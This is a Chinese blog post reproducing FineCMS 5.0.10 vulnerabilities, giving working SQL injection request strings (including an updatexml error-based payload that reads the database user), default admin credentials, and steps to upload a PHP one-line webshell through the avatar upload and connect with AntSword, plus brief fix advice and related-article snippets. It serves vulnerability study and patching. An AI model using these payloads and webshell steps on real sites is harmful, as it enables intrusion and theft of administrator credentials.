finecms SQL注入(CVE-2017-11582)

已于 2024-01-08 15:36:36 修改
阅读量601 收藏 9
点赞数 8
文章标签: sql 数据库
于 2024-01-08 15:01:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135457404
版权

漏洞描述:

FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10版本存在任意文件上传和SQL注入漏洞。

其中任意文件上传漏洞在上传用户头像处,可通过上传一句话木马,修改数据包内容,获取网站Shell。而SQL注入漏洞则可以通过注入获取到管理员的账号密码。

复现过程:

1.访问http://ip:port,进入登录界面

2.爆破当前用户

index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=action=sql sql='select user();'

3.通过报错注入查询当前用户

index.php?s=member&c=api&m=checktitle&id=1&title=1&module=news,(select%20(updatexml(1,concat(1,(select%20user()),0x7e),1)))q

4.登录后台

账号:admin

密码:admin

5.点击上传头像,上传一个jpg图片,并抓包

6.修改jpeg为php,并将文件内容改为php一句话木马,并对其进行base64编码

7.在此处右键,获取图片位置

8.蚁剑连接,getshell

修复建议:

  1. 升级版本。
  2. 使用白名单。
  3. 对提交的参数信息进行过滤。
慕筱蚺
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FineCMS企业版 v2017.3.23
12-01
FineCMS企业网站管理系统(简称版或企业版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案,适
Finecms SQL注入漏洞 (CVE-2018-6893)
m0_65150886的博客
01-08 808
借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;服务器被远程控制,被安装后门。Finecms 5.2.0版本中的controllers/member/Api.php文件存在SQL注入漏洞,该漏洞源于程序没有进行有效的过滤。远程攻击者可利用该漏洞执行SQL命令。1.访问http://ip:port,出现如下页面,开始实验。
【某CMS漏洞】SQL注入漏洞分析
最新发布
qingkahui24689的博客
05-15 669
本文直接从一个入口的注入点展开,想找到一条合适的链路到GetShell的完整过程,但是遗憾的是,没能解决6位随机后台地址的问题,故实际利用起来的话,局限性还是有的,姑且称之为一次分享式的尝试性代码审计体验录吧。黑客&网络安全如何学习。
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9225
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
FineCMS-v5.0.1漏洞审计
m0_52920608的博客
04-27 2580
FIneCMS漏洞审计
finecms aip.php漏洞,Finecms 2 /models/search_model.php SQL注入漏洞
weixin_36337502的博客
03-11 389
"""If you have issues about development, please read:https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.mdfor more about information, plz visit http://pocsuite.org"""from pocsuite3.api impo...
技能篇丨FineCMS 5.0.10 多个漏洞详细分析
dfdhxb995397的博客
05-29 1223
今天是一篇关于技能提升的文章,文章中的CMSFineCMS,版本是5.0.10版本的几个漏洞分析,主要内容是介绍漏洞修补前和修补后的分析过程,帮助大家快速掌握该技能。 注:篇幅较长,阅读用时约7分钟。 任意文件上传漏洞 1、漏洞复现 用十六进制编辑器写一个包含一句话木马的图片,去网站注册一个账号,然后到上传头像的地方。 抓包,修改文件后缀名为.php并发包。 ...
CVE-2017-11882漏洞分析
datouyu0824的博客
03-21 1651
1. 软件简介 Office 是一套由微软公司开发的办公软件,为Windows和AppleMacintosh操作系统而开发。与办公室应用程序一样,它包括联合的服务器和基于互联网的服务。 Eqnedt32.exe为各版本的微软Office公式编辑器组件 2. 漏洞成因 CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校
FineCMS-v2.2.1.rar_V2 _finecms
09-23
FineCMS是一款基于PHP+MySql运行环境的内容管理系统,采用MVC设计...FineCMS采用插件化方式开发,功能易用便于扩展,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案
FineCMS企业版 v2017.3.3
12-02
FineCMS企业网站管理系统(简称版或企业版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中...
finecms-含有前台文件上传漏洞源码包.zip
01-04
《细解FineCMS前台文件上传漏洞及其源码分析》 FineCMS是一款常见的开源内容管理系统,以其易用性和灵活性深受开发者喜爱。然而,如同其他软件一样,FineCMS也存在潜在的安全问题,其中最为突出的就是前台文件上传...
FineCMS-v2.2.1.rar_finecms 插件_finecms2.1手册
09-23
FineCMS的开源版本,开源CMS系统,基于PHP+MYSQL架构,采用MVC设计模式,具备自定义模型和字段、多站点及分站、多国语言支持、负载能力强、模板制作方便、支持文章内链、用于拓展内容模型和会员模型的表单功能、推荐...
CVE-2017-11882 Office漏洞
sxr__nc的博客
03-16 785
简介 CVE-2017-11882属于缓冲区溢出类型漏洞,造成漏洞的原因是,EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。 深究其中的具体原因还要对ole文件的数据格式进行了解: ole文件的数据格式 ...
【Windows】CVE-2017-11882漏洞利用
古月浪子的博客
02-09 3049
CVE-2017-11882是一个Office的漏洞,虽然该漏洞已经有补丁了,且杀毒软件也能查出利用了该漏洞的恶意文档,但是学习和复现该漏洞仍是一项令人受益颇多的过程 为了复现该漏洞,我们需要准备Office2016及以前的版本,这里我选择的是2016版本 利用漏洞的主要手段是,依靠公式编辑器中的缓冲区溢出执行短长度命令行以及Office自动在TEMP目录下临时释放附件的特性,达到执行任意代码的效果 导致漏洞的罪魁祸首就是一个叫EQNEDT32.EXE的程序,该文件的位置可以用任务管理器查看进程文件来定位
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
weixin_30539835的博客
04-04 823
转载自:https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html 目标环境: 比如,目标存在一个上传的逻辑: <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); ...
【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
Unitue_逆流
10-13 8178
实验环境 操作机:Windows 7IP:172.16.11.2 实验工具XAMPP: 一个功能强大的建站集成软件包 可以实现服务器的功能,但是只能自己访问 Firefox: 中文俗称‘火狐’,一个自由及开放源代码网页浏览器漏洞介绍继S2-052之后,Apache Struts 2再次被曝存在远程代码执行漏洞,漏洞编号S2-053,CVE编号CVE-2017-1000112。当开发人员在Fr
第四届“百越杯”福建省高校网络空间安全大赛决赛AWD攻防题目解题思路
SWEET0SWAT的博客
12-26 3048
第四届“百越杯”福建省高校网络空间安全大赛决赛AWD攻防题目解题思路 0x00 前言 AWD网络拓扑 0x01 U-web-fineCMS WEBShell检测 这里没有直接可以利用的webshell,将其和网站上下的源码进行对比,除了第三个文件差别比较多之外,就没有其他的区别了。 漏洞查找 这个FineCMS是开源的代码,所以直接查找是否有现成的漏洞: https://www.freebu...
FineCMS 5.0.10 多个 漏洞详细分析过程
xiaoi123的博客
11-20 3117
i春秋作家:F0rmat 0x01 前言 已经一个月没有写文章了,最近发生了很多事情,水文一篇。 今天的这个CMSFineCMS,版本是5.0.10版本的几个漏洞分析,从修补漏洞前和修补后的两方面去分析。 文中的evai是特意写的,因为会触发论坛的防护机制,还有分页那一段的代码也去掉了,因为会触发论坛分页的bug。 0x02 环境搭建 https://www.ichunqiu.co...
finecms逻辑漏洞
06-06
FineCMS是一款开源的内容管理系统,它的逻辑漏洞可能会导致安全问题。以下是FineCMS常见的逻辑漏洞: 1.未经身份验证的访问:FineCMS的某些页面没有进行身份验证,可能会通过直接访问URL来绕过身份验证机制,获取敏感信息或执行特权操作。 2.输入验证不足:FineCMS的某些输入字段没有进行足够的验证,可能会导致SQL注入、跨站点脚本攻击等安全问题。 3.弱密码策略:FineCMS的默认密码策略较弱,可能会导致用户密码被猜测或破解,进而导致系统被攻击。 4.文件上传漏洞:FineCMS的文件上传功能可能存在漏洞,攻击者可以上传恶意文件,导致系统被攻击。 5.逻辑错误:FineCMS的某些功能可能存在逻辑错误,攻击者可以通过利用这些错误来执行特权操作或获取敏感信息。 总之,为了减少FineCMS的逻辑漏洞,建议及时更新最新版本,加强安全策略,进行安全测试和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值